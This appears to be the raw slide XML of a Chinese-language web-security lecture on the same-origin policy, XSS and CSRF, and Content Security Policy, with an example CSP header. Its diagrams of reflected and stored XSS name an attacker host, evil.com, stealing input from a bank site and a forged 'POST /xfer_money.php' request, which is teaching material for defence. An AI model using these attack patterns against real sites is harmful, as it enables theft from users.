            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>画布、音频、视频标签</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>存储</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>离线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>拖拽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Drag-and-drop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>消息传递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534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同源策略的问题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安全专家认为同源策略不够强？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认为所有的源都是等价的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>任意源可能提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击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不允许源设置限制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来自某些源的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;scripts&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开发者认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>太严格了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禁止发往其它源的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XHR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>禁止访问其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>web APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（如谷歌地图）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>禁止在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>间共享内容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233359" y="1809940"/>
            <a:ext cx="1823961" cy="1971092"/>
            <a:chOff x="8739673" y="2226906"/>
            <a:chExt cx="2244876" cy="2425959"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Right Brace 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8739673" y="2226906"/>
              <a:ext cx="566058" cy="2425959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79430" y="3024386"/>
              <a:ext cx="1405119" cy="85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>
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>CSP</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>sandbox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33360" y="4604999"/>
            <a:ext cx="2370585" cy="1028506"/>
            <a:chOff x="8739673" y="4851918"/>
            <a:chExt cx="2917643" cy="1265853"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Right Brace 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8739673" y="4851918"/>
              <a:ext cx="566058" cy="1265853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79429" y="5069346"/>
              <a:ext cx="2077887" cy="85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 err="1">
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>postMessage</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1950" dirty="0">
                <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1950" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>CORS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46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XSS攻击回顾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805364" y="2859486"/>
            <a:ext cx="1496331" cy="265558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31" name="Rectangular Callout 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7487287" y="4624761"/>
            <a:ext cx="2134784" cy="918854"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70980"/>
              <a:gd name="adj2" fmla="val -10792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Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>输入是如何被盗的？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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20505" y="1606496"/>
            <a:ext cx="5091280" cy="3980409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056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7584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0112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2640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正常情况下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bofw.com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不会主动给</a:t>
            </a:r>
            <a:r>
              <a:rPr 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 evil.com</a:t>
            </a:r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发请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2275" dirty="0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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2275">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>白名单机制？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2275">
              <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" alt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如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>code.jquery.com, google-analytics.com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70" y="2958054"/>
            <a:ext cx="606951" cy="60695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83162" y="5078399"/>
            <a:ext cx="944489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>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>evil.com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17" y="4536187"/>
            <a:ext cx="539459" cy="5394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87" y="4363997"/>
            <a:ext cx="521529" cy="52152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90" y="1707908"/>
            <a:ext cx="751838" cy="751838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stCxn id="36" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6586587" y="3565004"/>
            <a:ext cx="8258" cy="8908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08117" y="3179771"/>
            <a:ext cx="1002250" cy="1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108116" y="3462672"/>
            <a:ext cx="8932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36" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6594845" y="2459746"/>
            <a:ext cx="7464" cy="498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915126" y="2465656"/>
            <a:ext cx="1706945" cy="1473445"/>
            <a:chOff x="8438938" y="2517299"/>
            <a:chExt cx="2100855" cy="181347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8438938" y="3909353"/>
              <a:ext cx="1347905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  <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>bofw.com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38938" y="2517299"/>
              <a:ext cx="2100855" cy="66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3" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                  <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>Bank of Washington</a:t>
              </a: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3190">
              <a:off x="9566647" y="2570564"/>
              <a:ext cx="440390" cy="236506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7009394" y="1410288"/>
            <a:ext cx="171874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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" u="sng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9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内容安全策略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2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Mozilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>浏览器安全框架</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>由默认信任模型增强为白名单模型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>控制应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扩展行为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>允许开发者对每个文档进行限制声明</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>服务器在头部声明</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3316231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Header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3488386"/>
            <a:ext cx="8754933" cy="272667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CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现了两种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>响应头</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Security-Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Security-Policy-Report-Only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>条目、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、关键字、动作组成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如果使用了CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>浏览器切换到白名单模式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内联</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>都被禁止</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和类似函数都被禁用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1038" y="1500070"/>
            <a:ext cx="8543925" cy="1798328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28964"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK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E28964"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Type: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text/html; charset=utf-8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E28964"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Security-Policy: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default-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https://www.example.com;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script-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5B042"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'self'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	https://apis.google.com;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frame-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5B042"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'none'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object-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65B042"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'none'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;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="89BDFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>report-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="89BDFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uri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	/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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my_amazing_csp_report_parser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561232" y="1310082"/>
            <a:ext cx="1182656" cy="445599"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20627"/>
              <a:gd name="adj2" fmla="val 176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</a:rPr>
              <a:t>条目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973848" y="1310082"/>
            <a:ext cx="977965" cy="445599"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20627"/>
              <a:gd name="adj2" fmla="val 176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</a:rPr>
              <a:t>源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300729" y="1310082"/>
            <a:ext cx="1181391" cy="445599"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -66899"/>
              <a:gd name="adj2" fmla="val 2438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</a:rPr>
              <a:t>关键字</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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624837" y="2724994"/>
            <a:ext cx="981755" cy="445599"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -122043"/>
              <a:gd name="adj2" fmla="val -45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  <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>动作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36381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CSP条目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设置限制源（白名单）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script-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：可信脚本源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connect-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：可信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XHR/Websockets/EventSource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>源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object-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：可信插件源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media-src, style-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, font-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img-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, frame-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default-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：其它未定义的可信源都按照该设置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XSS攻击回顾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1" y="3554321"/>
            <a:ext cx="606951" cy="6069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8809" y="5674666"/>
            <a:ext cx="83875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25" dirty="0"/>
              <a:t>evil.com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98" y="5132454"/>
            <a:ext cx="539459" cy="539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68" y="4960264"/>
            <a:ext cx="521529" cy="5215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71" y="2304175"/>
            <a:ext cx="751838" cy="751838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1" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1243239" y="4161272"/>
            <a:ext cx="4388" cy="4733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60898" y="3776038"/>
            <a:ext cx="1002250" cy="1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760897" y="4058939"/>
            <a:ext cx="8932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1" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1247626" y="3056013"/>
            <a:ext cx="7464" cy="498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989223" y="3157616"/>
            <a:ext cx="2326494" cy="1577809"/>
            <a:chOff x="7726714" y="2635073"/>
            <a:chExt cx="2863377" cy="1941919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726714" y="3909354"/>
              <a:ext cx="2772358" cy="667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bofw.com</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1300" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>CSP: default-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1300" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t> bofw.com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89236" y="2635073"/>
              <a:ext cx="2100855" cy="66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3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Bank of Washington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3190">
              <a:off x="9864207" y="2688337"/>
              <a:ext cx="440390" cy="236506"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Multiply 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833071" y="4155832"/>
            <a:ext cx="829108" cy="82910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42" name="TextBox 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1844653" y="1998297"/>
            <a:ext cx="171232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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" u="sng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14" y="3554321"/>
            <a:ext cx="606951" cy="60695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834" y="2304175"/>
            <a:ext cx="751838" cy="751838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6205581" y="3728825"/>
            <a:ext cx="1002250" cy="10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214414" y="3902766"/>
            <a:ext cx="993417" cy="5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2"/>
            <a:endCxn id="59" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5713289" y="3056013"/>
            <a:ext cx="7464" cy="4983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6454887" y="3156911"/>
            <a:ext cx="2252541" cy="1578513"/>
            <a:chOff x="7726714" y="2634206"/>
            <a:chExt cx="2772358" cy="1942786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7726714" y="3909354"/>
              <a:ext cx="2772358" cy="667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bofw.com</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1300" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>CSP: default-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1300" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t> bofw.com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41699" y="2634206"/>
              <a:ext cx="2100855" cy="66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3" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>Bank of Washington</a:t>
              </a:r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3190">
              <a:off x="9315081" y="2752231"/>
              <a:ext cx="440390" cy="236506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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6016765" y="1998297"/>
            <a:ext cx="171232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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1950" u="sng">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>存储攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" u="sng" dirty="0">
              <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="76" name="Curved Connector 75"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="63" idx="3"/>
            <a:endCxn id="71" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096672" y="2680094"/>
            <a:ext cx="1386363" cy="47681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205580" y="4071755"/>
            <a:ext cx="1002250" cy="105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ular Callout 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986147" y="5110398"/>
            <a:ext cx="3032018" cy="497072"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -3958"/>
              <a:gd name="adj2" fmla="val -22467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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xfer_money.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Rectangular Callout 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7693742" y="2165203"/>
            <a:ext cx="2117723" cy="910008"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -67487"/>
